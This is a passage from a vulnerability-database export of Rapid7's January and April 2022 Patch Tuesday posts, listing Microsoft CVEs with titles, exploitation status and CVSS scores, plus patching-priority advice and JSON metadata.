Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2022-21855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n[CVE-2022-21969](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21969>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9 | Yes \n \n### Microsoft Dynamics vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21932>) | Microsoft Dynamics 365 Customer Engagement Cross-Site Scripting Vulnerability | No | No | 7.6 | No \n[CVE-2022-21891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21891>) | Microsoft Dynamics 365 (on-premises) Spoofing Vulnerability | No | No | 7.6 | No \n \n### Microsoft Office vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21842](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21842>) | Microsoft Word Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21837](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21837>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-21840](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21840>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21841>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### Windows vulnerabilities\n\nCVE | Title | Exploited | Publicly disclosed | CVSSv3 base | Additional FAQ \n---|---|---|---|---|--- \n[CVE-2022-21895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21895>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21864](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21864>) | Windows UI Immersive Server API Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21866](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21866>) | Windows System Launcher Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21875>) | Windows Storage Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21863>) | Windows StateRepository API Server file Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21874](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21874>) | Windows Security Center API Remote Code Execution Vulnerability | No | Yes | 7.8 | No \n[CVE-2022-21892](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21892>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21958>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21959>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21960>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21961>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21962>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.8 | Yes \n[CVE-2022-21963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21963>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.4 | Yes \n[CVE-2022-21928](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21928>) | Windows Resilient File System (ReFS) Remote Code Execution Vulnerability | No | No | 6.3 | Yes \n[CVE-2022-21867](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21867>) | Windows Push Notifications Apps Elevation Of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21888>) | Windows Modern Execution Server Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21881>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21879](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21879>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 5.5 | No \n[CVE-2022-21849](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21849>) | Windows IKE Extension Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-21901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21901>) | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 9 | Yes \n[CVE-2022-21847](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21847>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-21878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21878>) | Windows Geolocation Service Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21839](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21839>) | Windows Event Tracing Discretionary Access Control List Denial of Service Vulnerability | No | Yes | 6.1 | No \n[CVE-2022-21868](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21868>) | Windows Devices Human Interface Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21921](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21921>) | Windows Defender Credential Guard Security Feature Bypass Vulnerability | No | No | 4.4 | No \n[CVE-2022-21906](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21906>) | Windows Defender Application Control Security Feature Bypass Vulnerability | No | No | 5.5 | No \n[CVE-2022-21852](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21852>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21902](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21902>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21896>) | Windows DWM Core Library Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21858](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21858>) | Windows Bind Filter Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-21860](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21860>) | Windows AppContracts API Server Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21876](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21876>) | Win32k Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21882>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-21887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21887>) | Win32k Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-21873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21873>) | Tile Data Repository Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21861>) | Task Flow Data Engine Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21870](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21870>) | Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21877>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-21894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21894>) | Secure Boot Security Feature Bypass Vulnerability | No | No | 4.4 | No \n[CVE-2022-21964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21964>) | Remote Desktop Licensing Diagnoser Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-22947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-22947>) | Open Source Curl Remote Code Execution Vulnerability | No | Yes | nan | Yes \n[CVE-2022-21871](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21871>) | Microsoft Diagnostics Hub Standard Collector Runtime Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21910>) | Microsoft Cluster Port Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-36976](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36976>) | Libarchive Remote Code Execution Vulnerability | No | Yes | nan | Yes \n[CVE-2022-21907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21907>) | HTTP Protocol Stack Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-21917](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21917>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21912](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21912>) | DirectX Graphics Kernel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-21898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21898>) | DirectX Graphics Kernel Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-21918](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21918>) | DirectX Graphics Kernel File Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-21865](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21865>) | Connected Devices Platform Service Elevation of Privilege Vulnerability | No | No | 7 | No \n[CVE-2022-21869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21869>) | Clipboard User Service Elevation of Privilege Vulnerability | No | No | 7 | No", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-11T21:41:56", "type": "rapid7blog", "title": "Patch Tuesday - January 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21907", "CVE-2021-22947", "CVE-2021-31166", "CVE-2021-36976", "CVE-2022-0096", "CVE-2022-0097", "CVE-2022-0098", "CVE-2022-0099", "CVE-2022-0100", "CVE-2022-0101", "CVE-2022-0102", "CVE-2022-0103", "CVE-2022-0104", "CVE-2022-0105", "CVE-2022-0106", "CVE-2022-0107", "CVE-2022-0108", "CVE-2022-0109", "CVE-2022-0110", "CVE-2022-0111", "CVE-2022-0112", "CVE-2022-0113", "CVE-2022-0114", "CVE-2022-0115", "CVE-2022-0116", "CVE-2022-0117", "CVE-2022-0118", "CVE-2022-0120", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21837", "CVE-2022-21838", "CVE-2022-21839", "CVE-2022-21840", "CVE-2022-21841", "CVE-2022-21842", "CVE-2022-21843", "CVE-2022-21846", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21855", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21859", "CVE-2022-21860", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21863", "CVE-2022-21864", "CVE-2022-21865", "CVE-2022-21866", "CVE-2022-21867", "CVE-2022-21868", "CVE-2022-21869", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21875", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21878", "CVE-2022-21879", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21891", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21895", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21898", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21910", "CVE-2022-21911", "CVE-2022-21912", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21917", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21929", "CVE-2022-21930", "CVE-2022-21931", "CVE-2022-21932", "CVE-2022-21954", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963", "CVE-2022-21964", "CVE-2022-21969", "CVE-2022-21970"], "modified": "2022-01-11T21:41:56", "id": "RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "href": "https://blog.rapid7.com/2022/01/11/patch-tuesday-january-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-19T21:29:45", "description": "\n\nFrom Defender to Windows, Office to Azure, this month\u2019s Patch Tuesday has a large swath of Microsoft\u2019s portfolio getting vulnerabilities fixed. 119 CVEs [were addressed today](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr>), not including the 26 Chromium vulnerabilities that were fixed in the Edge browser.\n\nOne of these has been observed being exploited in the wild: [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>), reported to Microsoft by the National Security Agency, affects the Common Log File System Driver in all supported versions of Windows and allows attackers to gain additional privileges on a system they already have local access to. Another local privilege escalation (LPE), [CVE-2022-26904](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26904>) affecting the Windows User Profile Service, had been publicly disclosed but not reported as already being exploited \u2013 it\u2019s harder for attackers to leverage as it relies on winning a race condition, which can be tricky to reliably achieve.\n\nLPEs don\u2019t always get the same attention that remote code execution (RCE) vulnerabilities do, but they can be a great help to attackers after they gain an initial foothold. These two categories dominate this month\u2019s vulnerabilities, with 55 LPEs and 47 RCEs getting patched. 10 of the RCEs are considered \u201cCritical,\u201d affecting Windows Hyper-V ([CVE-2022-22008](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22008>), [CVE-2022-23257](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23257>), [CVE-2022-24537](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24537>)); Windows SMB Client ([CVE-2022-24500](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500>), [CVE-2022-24541](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24541>)); Windows Network File System ([CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>)); LDAP ([CVE-2022-26919](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26919>)); Microsoft Dynamics ([CVE-2022-23259](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23259>)); and the Windows RPC Runtime ([CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>)).\n\nOn the Office side of the house, Skype for Business Server was patched for spoofing ([CVE-2022-26910](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26910>)) and information disclosure ([CVE-2022-26911](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26911>)) vulnerabilities. Two RCEs affecting Excel ([CVE-2022-24473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24473>) and [CVE-2022-26901](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26901>)) were fixed, as well as a spoofing vulnerability in SharePoint Server ([CVE-2022-24472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24472>)).\n\nWith so many vulnerabilities to manage, it can be difficult to prioritize. Thankfully, most of this month\u2019s CVEs can be addressed by patching the core OS. Administrators should first focus on updating any public-facing servers before moving on to internal servers and then client systems. The SMB Client vulnerabilities can also be mitigated by blocking port 445/tcp at the network perimeter \u2013 victims need to be enticed to connect to a malicious SMB server, and this would help against Internet-based attackers. Of course, this won\u2019t help much if the malicious system was set up within the perimeter.\n\nFor any readers who enjoy deeper dives into vulnerabilities and exploits, Rapid7\u2019s Jake Baines has a [technical writeup](<https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/>) of [CVE-2022-24527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24527>), an LPE he discovered in the Connected Cache component of Microsoft Endpoint Manager that got fixed today. Check it out!\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Azure Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26898>) | Azure Site Recovery Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2022-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26896>) | Azure Site Recovery Information Disclosure Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26897>) | Azure Site Recovery Information Disclosure Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-26907](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26907>) | Azure SDK for .NET Information Disclosure Vulnerability | No | No | 5.3 | Yes \n \n### Browser Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-24523](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24523>) | Microsoft Edge (Chromium-based) Spoofing Vulnerability | No | No | 4.3 | Yes \n[CVE-2022-24475](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24475>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26891>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26894>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26895>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26900](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26900>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26908](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26908>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26909](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26909>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-26912](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26912>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-1232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1232>) | Chromium: CVE-2022-1232 Type Confusion in V8 | No | No | N/A | Yes \n[CVE-2022-1146](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1146>) | Chromium: CVE-2022-1146 Inappropriate implementation in Resource Timing | No | No | N/A | Yes \n[CVE-2022-1145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1145>) | Chromium: CVE-2022-1145 Use after free in Extensions | No | No | N/A | Yes \n[CVE-2022-1143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1143>) | Chromium: CVE-2022-1143 Heap buffer overflow in WebUI | No | No | N/A | Yes \n[CVE-2022-1139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1139>) | Chromium: CVE-2022-1139 Inappropriate implementation in Background Fetch API | No | No | N/A | Yes \n[CVE-2022-1138](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1138>) | Chromium: CVE-2022-1138 Inappropriate implementation in Web Cursor | No | No | N/A | Yes \n[CVE-2022-1137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1137>) | Chromium: CVE-2022-1137 Inappropriate implementation in Extensions | No | No | N/A | Yes \n[CVE-2022-1136](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1136>) | Chromium: CVE-2022-1136 Use after free in Tab Strip | No | No | N/A | Yes \n[CVE-2022-1135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1135>) | Chromium: CVE-2022-1135 Use after free in Shopping Cart | No | No | N/A | Yes \n[CVE-2022-1134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1134>) | Chromium: CVE-2022-1134 Type Confusion in V8 | No | No | N/A | Yes \n[CVE-2022-1133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1133>) | Chromium: CVE-2022-1133 Use after free in WebRTC | No | No | N/A | Yes \n[CVE-2022-1131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1131>) | Chromium: CVE-2022-1131 Use after free in Cast UI | No | No | N/A | Yes \n[CVE-2022-1130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1130>) | Chromium: CVE-2022-1130 Insufficient validation of untrusted input in WebOTP | No | No | N/A | Yes \n[CVE-2022-1129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1129>) | Chromium: CVE-2022-1129 Inappropriate implementation in Full Screen Mode | No | No | N/A | Yes \n[CVE-2022-1128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1128>) | Chromium: CVE-2022-1128 Inappropriate implementation in Web Share API | No | No | N/A | Yes \n[CVE-2022-1127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1127>) | Chromium: CVE-2022-1127 Use after free in QR Code Generator | No | No | N/A | Yes \n[CVE-2022-1125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-1125>) | Chromium: CVE-2022-1125 Use after free in Portals | No | No | N/A | Yes \n \n### Developer Tools Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-26924](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26924>) | YARP Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-24513](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24513>) | Visual Studio Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26921](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26921>) | Visual Studio Code Elevation of Privilege Vulnerability | No | No | 7.3 | No \n[CVE-2022-24765](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24765>) | GitHub: Uncontrolled search for the Git directory in Git for Windows | No | No | N/A | Yes \n[CVE-2022-24767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24767>) | GitHub: Git for Windows' uninstaller vulnerable to DLL hijacking when run under the SYSTEM user account | No | No | N/A | Yes \n[CVE-2022-26832](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26832>) | .NET Framework Denial of Service Vulnerability | No | No | 7.5 | No \n \n### Microsoft Dynamics Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-23259](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23259>) | Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n \n### Microsoft Office Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-26910](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26910>) | Skype for Business and Lync Spoofing Vulnerability | No | No | 5.3 | Yes \n[CVE-2022-26911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26911>) | Skype for Business Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-24472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24472>) | Microsoft SharePoint Server Spoofing Vulnerability | No | No | 8 | Yes \n[CVE-2022-24473](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24473>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26901>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### SQL Server Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-23292](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23292>) | Microsoft Power BI Spoofing Vulnerability | No | No | 5.9 | Yes \n \n### System Center Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-24548](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24548>) | Microsoft Defender Denial of Service Vulnerability | No | No | 5.5 | Yes \n \n### Windows Vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-24543](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24543>) | Windows Upgrade Assistant Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-24550](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24550>) | Windows Telephony Server Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26786](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26786>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26789](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26789>) | Windows Print Spooler 